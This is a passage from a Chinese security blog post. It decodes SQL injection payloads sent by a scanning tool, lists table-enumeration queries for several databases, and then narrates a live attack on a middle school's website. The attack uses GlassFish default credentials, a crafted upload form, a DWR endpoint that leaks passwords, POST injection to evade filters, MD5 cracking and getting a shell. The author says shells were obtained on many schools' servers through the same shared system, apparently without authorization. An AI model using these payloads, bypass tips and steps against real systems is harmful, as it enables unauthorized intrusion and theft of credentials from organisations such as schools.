,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d),concat(0x5b64625d,database(),0x5b2f64625d,0x5b75735d,user(),0x5b2f75735d,0x5b765d,version(),0x5b2f765d)--
```
这玩意到底是什么神秘的东西呢？我们不妨在Navicat和FireFox里面瞅瞅：
￼
![原文图片](/media/2016/06/63596a162bee30ecab1c3fde73c72e72)

FireFox执行的结果：

![原文图片](/media/2016/06/680a20b00bf05f6a315dfe47a2400e89)

让我们来还原上面的那句废话：

```text
select file_priv from mysql.user where user=root
```
￼
![原文图片](/media/2016/06/8d4ddd8893f36bd256ddc3c9ae0432ea)

上面很长很臭的SQL翻译过来就这么短的一句查询的结果就一个得到的信息就是：
有没有file_priv权限。而file_priv应该就是文件读写权限了（没看手册，应该八九不离十）。如果不是Y是N那就不能load_file 、into outfile、dumpfile咯。
接着看下一条SQL：

```text
SELECT * from wps_posts where ID = 739 and 1=0 union select concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d),concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d)--
```

![原文图片](/media/2016/06/d83b28931bbc995ed333e08011a48a3d)

/*[h4ckinger]asim[/h4ckinger] 这段SQL看不出来有什么实际意义，没有对数据库进行任何操作。对应的SQL是：

```text
select concat(0x5b6834636b696e6765725d,'asim',0x5b2f6834636b696e6765725d)*/
```
没用的东西不管下一条也是点击start后的最后一条SQL同上。 那么我们可以知道点击注入点检测程序一共做了：

```text
1、是否存在注入点 2、注入点的字段数量 3、注入点获取Mysql的版本信息、用户信息、数据库名等。 4、是否有file_priv也就是是否能够读写硬盘文件。
```
程序逻辑分析：

```text
1、获取URL是否存在 2、获取URL地址并进行参数分析 3、提交and 1=1 and 1=2进行布尔判断，获取服务器的响应码判断是否存在SQL注入。 4、提交占位符获取注入点查询的字段数尝试order by 注入。 5、提交MYSQL自带的函数获取MYSQL版本信息、用户信息、数据库名等信息。 6、检测是否有load_file和outfile、dumpfile等权限。
```
SQL注入之获取所有用户表：

```text
1、Mssql:select name from master.dbo.sysdatabase 2、Mysql:show databases 3、Sybase:SELECT a.name,b.colid,b.name,c.name,b.usertype,b.length,CASE WHEN b.status=0 THEN 'NOT NULL' WHEN b.status=8 THEN 'NULL' END status, d.text FROM sysobjects a,syscolumns b,systypes c,syscomments d WHERE a.id=b.id AND b.usertype=c.usertype AND a.type='U' --AND a.name='t_user' AND b.cdefault*=d.id ORDER BY a.name,b.colid 4、Oracle:SELECT * FROM ALL_TABLES
```

### 0x03 简单实战

本次实战并没有什么难度，感觉找一个能把前面的都串起来的demo太难了。本次实战的目标是某中学，网站使用JavaWeb开发。去年的时候通过POST注入绕过了GET的防注入检测。对其和开发商的官网都做了SQL注入检测，然后加了开发商的QQ通知修补。
￼
![原文图片](/media/2016/06/59854765b0dedc048eca724ee65943ba)

前不久再去测试的时候发现漏洞已经被修补了，围观了下开发商后发现其用的是glassfish：
￼
![原文图片](/media/2016/06/8a9665383f94296d9b6b62f4b6f44da9)

![原文图片](/media/2016/06/8132b9c50b36683addf6d6dbd397ba76)

尝试从服务器弱口令入口了入手但是失败了glassfish的默认管理帐号是admin密码是adminadmin，如果能过登录glassfish的后台可以直接部署一个war去getshell。 ￼
![原文图片](/media/2016/06/599fc809911e0cc376bcebc6bfb33c27)

由于没有使用如Struts2之类的MVC框架所以google了下他的jsp，-News参数表示不希望在搜索结果中包含带有-News的结果。 ￼
![原文图片](/media/2016/06/fa2999bc525f6bc38a962cd75b6b7b98)

通过GOOGLE找到一处flash上传点，值得注意的是在项目当中上传下载一般作为一个共有的业务，所以可能存在一致性也就是此处要是上传不成功恐怕到了后台也不会成功。企图上传shell：
￼
![原文图片](/media/2016/06/aa44cd7490bd50783a551953140779b4)

上传文件：
因为tamper data 没法拦截flash请求，所以通过chrome的拦截记录开始构建上传:

```text
<html><head> <title></title></head> <body> <form enctype="multipart/form-data" action="http://www.x.cn/webschool/xheditor/upload.jsp?moduleId=98&limitExt=all&sid=0" method="post"> <input name="filedata" type="file"><br> <input type="submit" value="上传文件"> </form> </body> </html>
```

![原文图片](/media/2016/06/04852cc4f74d2c2701c0744bd46469ca)

好吧支持txt.html.exe什么的先来个txt： ￼
![原文图片](/media/2016/06/69fe8b6b3adf3bf51fc86dbda630258e)

一般来说我比较关注逻辑漏洞，比如找回密码，查看页面源码后还真就发现了点猫腻有DWR框架。

#### DWR框架：
DWR就是一个奇葩，人家都是想着怎么样去解耦，他倒好直接把js和后端java给耦合在一起了。DWR（Direct Web Remoting）是一个用于改善web页面与Java类交互的远程服务器端Ajax开源框架，可以帮助开发人员开发包含AJAX技术的网站。它可以允许在浏览器里的代码使用运行在WEB服务器上的JAVA方法，就像它就在浏览器里一样。
￼
![原文图片](/media/2016/06/77dd1be30e9be0d82de93c4825fc33b9)

再次利用chrome抓网络请求，居然发现后台把用户的密码都给返回了，这不科学啊： ￼
![原文图片](/media/2016/06/ea8da27857d3a3951ca1f36ce93a303b)

与此同时我把google到的动态连接都打开，比较轻易的就发现了一处SQL注入漏洞，依旧用POST提交吧，以免他的防注入又把我拦截下来了（再次提醒普通的防注入普遍防的是GET请求，POST过去很多防注入都傻逼了,Jsp里面request.getParameter("parameter")GET和POST方式提交的参数都能过获取到的）： ￼
![原文图片](/media/2016/06/90d37ce7b158e593ae8bf0319dfbf5e3)

破MD5，进后台改上传文件扩展名限制拿shell都一气呵成了：
￼
![原文图片](/media/2016/06/689c1027feb97a7ce2dc58c91ff6d770)

GETSHELL: ￼
![原文图片](/media/2016/06/bd2945e2b784b28dcf8c2b2ab53fef83)

可能实战写的有点简单了一点，凑合这看吧。由于这是一套通用系统，很轻易的通过该系统漏洞拿到很多学校的shell，截图中可能有漏点，希望看文章的请勿对其进行攻击！

## Replies
